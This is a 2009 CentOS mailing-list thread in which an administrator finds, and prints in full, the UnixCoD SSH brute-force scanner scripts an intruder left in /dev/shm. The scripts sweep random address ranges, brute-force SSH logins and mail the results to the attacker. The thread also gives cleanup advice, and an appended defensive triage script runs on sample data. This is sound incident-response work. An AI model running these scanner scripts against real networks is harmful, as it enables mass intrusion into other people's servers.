So you're going to need to figure out what the hole in your system is/was. You're going to need to patch it. You're going to need to examine the logs for logins to your other systems, as well as examine the ssh logs for outgoing login attempts from the hacked box to other boxes in your network. If the other boxes in your network have webservers that are exposed to the net, you're going to have to examine them as well. You're going to have to check for other files (/dev/shm, etc.) on the other boxes.

But in all probability, you should reinstall on the initial box, once you've resolved how to correct the issue (this includes analyzing the webserver apps!).

Good luck!

-----Original Message-----
From: Linux Advocate [mailto:linuxhousedn at yahoo.com]
Sent: Wednesday, June 03, 2009 9:33 AM
To: bruce
Cc: CentOS mailing list
Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

BRUCE, YOU ARE A F******* GENIUS, MAN!!!!! You were right, bro. Thanks for spending the time on this, man. More info below!

----- Original Message ----
> From: bruce <bedouglas at earthlink.net>
> To: linuxhousedn at yahoo.com
> Sent: Wednesday, June 3, 2009 9:53:24 PM
> Subject: RE: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
>
> hi...
>
> i've seen a few of your threads on your issue of the 'atack' processes
> running from your web server...
>
> i'm replying to you offline, as ......
>
> take a look over your box, and let's see what you have...

As per your tip, I found a file called atack under the folder /dev/shm/unix, even though I could not locate such a file before. I have now removed that file and am now probing the contents of the /dev/shm/unix folder.

[root at fwgw unix]# pwd
/dev/shm/unix
[root at fwgw unix]# ls -al
total 4352
drwxr-xr-x 2 apache apache     360 Jun  3 23:47 .
drwxrwxrwt 3 root   root        60 Jun  3 00:24 ..
-rwxr-xr-x 1 apache apache       0 May 19 06:02 124.164.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:28 129.135.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:25 129.find.22
-rwxr-xr-x 1 apache apache       0 May 25 13:54 21.168.find.22
-rwxr-xr-x 1 apache apache   12687 May 25 06:16 60.191.find.22
-rw-r--r-- 1 apache apache       0 Jun  3 23:45 83.182.find.22
-rwxr-xr-x 1 apache apache    4631 Apr 21 17:50 84.2.find.22
-rwxr-xr-x 1 apache apache       0 May 25 06:17 89.38.find.22
-rwxr-xr-x 1 apache apache    2362 May 19 15:28 91.204.find.22
-rwxr-xr-x 1 apache apache     216 May 18  2005 auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf
-rwxr-xr-x 1 apache apache   15729 Oct 14  2005 find
-rw-r--r-- 1 apache apache    5262 Jun  3 23:45 log
-rwxr-xr-x 1 apache apache     751 May 25 06:33 unix
-rw-r--r-- 1 apache apache       0 Jun  3 23:04 vuln.txt
-rwxr-xr-x 1 apache apache     671 May 25 13:56 x

The contents of file 'x' are (the Romanian messages are kept as found, with an English translation in a comment after each):

#!/bin/bash
echo "[+] PLM prea destept pentru voi : Yuli [+]"   # "[expletive] too clever for you : Yuli"
X=0
c=0
# Loop 256 times; each pass picks a random third octet of the /16 given as $1
# and works through that /24.
while [ $X -le 255 ]
do
c=$RANDOM
let "c %= 255"
echo "[+] Scanam radom class b $1.$c [+]"   # "Scanning random class B $1.$c"
./find $1.$c 22          # port-22 sweep of $1.$c.0/24; hosts found go into $1.$c.find.22
sleep 10
cat $1.$c.find.22 |sort |uniq > ip.conf      # de-duplicated target list for the brute-forcer
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"   # "Now the coolest part begins :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"   # "Only $oopsnr2 servers. There's a first time for everything!"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"   # "Let's see how many servers we can break into"
./atack 100 >> log       # SSH user/password brute force against ip.conf, 100 threads, output appended to log
mail -s $1.$c yuli1989xxx at yahoo.com < log   # results mailed to the operator, subject = the /24 scanned
rm -rf $1.$c.find.22 ip.conf
echo "[+] Scanner a terminat de scanat !"   # "Scanner finished scanning!"
echo "[+] Next random class b !"
X=$((X+1))
done   # the closing 'done' is missing from the listing as pasted; added here so the loop is well formed

The contents of the file 'unix' are:

#!/bin/bash
if [ $# != 1 ]; then
echo "[+] Folosim : $0 [b class]"   # "Usage: $0 [b class]"
exit;
fi
echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+] SSH Brute force scanner : user & password [+]"
echo "[+] Undernet Channel : #yuli [+]"
echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]"
./find $1 22             # same sweep as in 'x', but for one /24 given on the command line
sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"   # "Now the coolest part begins :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"   # "Only $oopsnr2 servers. There's a first time for everything!"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"   # "Let's see how many servers we can break into"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"   # "UnixCoD scanner finished scanning!"

The contents of 'auto' are:

#!/bin/sh
# Writes a one-line shell command to the chosen output file that runs
# ./assh against every /24 of the given /16 ("A class range" as the author
# calls it). 'assh' itself is not in the directory listing above.
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
echo -n "./assh $brange.$crange ; " >> $file
let crange=crange+1
done

The contents of 'log' are:

[+] No SSH ->www:www:83.246.113.34
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] No SSH ->www:www:83.246.119.41
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]

Further googling indicates that UnixCoD is a brute-force SSH scanner. What is odd is that I have fail2ban running (which blocks IPs after 2 failed attempts) and an 8-letter password, but I still got hacked.

Guys, any comments?

AND ONCE AGAIN, THANKS BRUCE!

Regards,
Marco.
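A small triage helper for the checks bruce lists at the top of the thread: executables the web-server user dropped under /dev/shm or similar writable directories, sshd records on the other hosts of login attempts coming from the compromised box, and the hosts the scanner's own 'log' file says it probed. This is an added example, not code from the thread or from the scanner; the directory tree, log lines and IP addresses it uses are constructed for the demo, and it assumes the syslog-style sshd records CentOS 5 writes to /var/log/secure. One caveat worth spelling out: sshd only logs inbound attempts, so "outgoing" brute force from the hacked machine is found in the sshd logs of the hosts it targeted, which is why the log function takes another host's log plus the hacked box's address. The listing above also shows every dropped file owned by apache, which points at the web application rather than sshd as the way in, the part bruce flags with "analyzing the webserver apps".

```shell
#!/bin/sh
# Added triage helper for the thread above; not part of the original
# mail. Everything under $WORK, the log lines and the IP addresses are
# constructed sample data. Assumes syslog-style sshd records as written
# to /var/log/secure on CentOS 5.

# 1. Executable regular files owned by the web-server user under the
#    writable directories the scanner used (/dev/shm in the thread).
#    Arguments: owner name, then one or more directories to search.
dropped_exec_files() {
    owner="$1"; shift
    find "$@" -xdev -type f -user "$owner" -perm -u+x 2>/dev/null | sort
}

# 2. Auth records on ANOTHER host that came from the compromised box.
#    Matches "Failed password for [invalid user ]NAME from IP port N ssh2"
#    and "Accepted password|publickey for NAME from IP port N ssh2" and
#    prints one "Result user source" line per record. The " port " in the
#    fixed-string match stops 192.0.2.10 from also matching 192.0.2.100.
ssh_attempts_from() {
    logfile="$1"; src="$2"
    grep -F " from $src port " "$logfile" \
      | sed -nE 's/.*sshd\[[0-9]+\]: (Failed|Accepted) [a-z]+ for (invalid user )?([^ ]+) from ([^ ]+) port .*/\1 \3 \4/p'
}

# Successful logins from the compromised box. Anything above zero means
# that host has to be treated as compromised too.
accepted_logins_from() {
    ssh_attempts_from "$1" "$2" | grep -c '^Accepted ' || true
}

# 3. Hosts recorded in the scanner's own "log". The thread shows lines
#    like "[+] No SSH ->www:www:83.246.113.34"; the third colon-separated
#    field after "->" is the address that was probed.
scanner_targets() {
    sed -nE 's/^\[\+\] No SSH ->[^:]*:[^:]*:([0-9.]+).*/\1/p' "$1" | sort -u
}

# --- constructed sample data (not from the thread) -----------------------
WORK=$(mktemp -d)
mkdir -p "$WORK/shm/unix"
for f in atack find x; do : > "$WORK/shm/unix/$f"; chmod 755 "$WORK/shm/unix/$f"; done
: > "$WORK/shm/unix/log"                  # data file, not executable
chmod 644 "$WORK/shm/unix/log"

SAMPLE_SECURE="$WORK/secure"              # stands in for another host's /var/log/secure
cat > "$SAMPLE_SECURE" <<'EOF'
Jun  3 23:47:01 dbhost sshd[4121]: Failed password for invalid user admin from 192.0.2.10 port 51234 ssh2
Jun  3 23:47:03 dbhost sshd[4121]: Failed password for root from 192.0.2.10 port 51236 ssh2
Jun  3 23:48:10 dbhost sshd[4130]: Accepted password for backup from 192.0.2.10 port 51240 ssh2
Jun  3 23:50:00 dbhost sshd[4140]: Accepted publickey for marco from 198.51.100.7 port 40000 ssh2
Jun  3 23:51:12 dbhost sshd[4150]: Failed password for root from 192.0.2.100 port 51300 ssh2
EOF

SAMPLE_SCANLOG="$WORK/scanner.log"        # constructed excerpt in the scanner's log format
cat > "$SAMPLE_SCANLOG" <<'EOF'
[+] No SSH ->www:www:83.246.113.34
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] No SSH ->www:www:83.246.119.41
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
EOF

# Run the three checks, with 192.0.2.10 standing in for the hacked box.
# On a real host the owner would be "apache" and the directories
# /dev/shm /tmp /var/tmp.
dropped_exec_files "$(id -un)" "$WORK/shm"
ssh_attempts_from "$SAMPLE_SECURE" 192.0.2.10
echo "accepted logins from 192.0.2.10: $(accepted_logins_from "$SAMPLE_SECURE" 192.0.2.10)"
scanner_targets "$SAMPLE_SCANLOG"
```

Run it as-is to see the three reports on the constructed data; on the real hosts, point `dropped_exec_files apache /dev/shm /tmp /var/tmp` at each box and feed `ssh_attempts_from` the /var/log/secure of every host the hacked machine could reach, using the hacked machine's internal address. The `.find.22` files and `ip.conf` lists in the listing are the scanner's own target inventories and are worth keeping for the same purpose before the box is reinstalled.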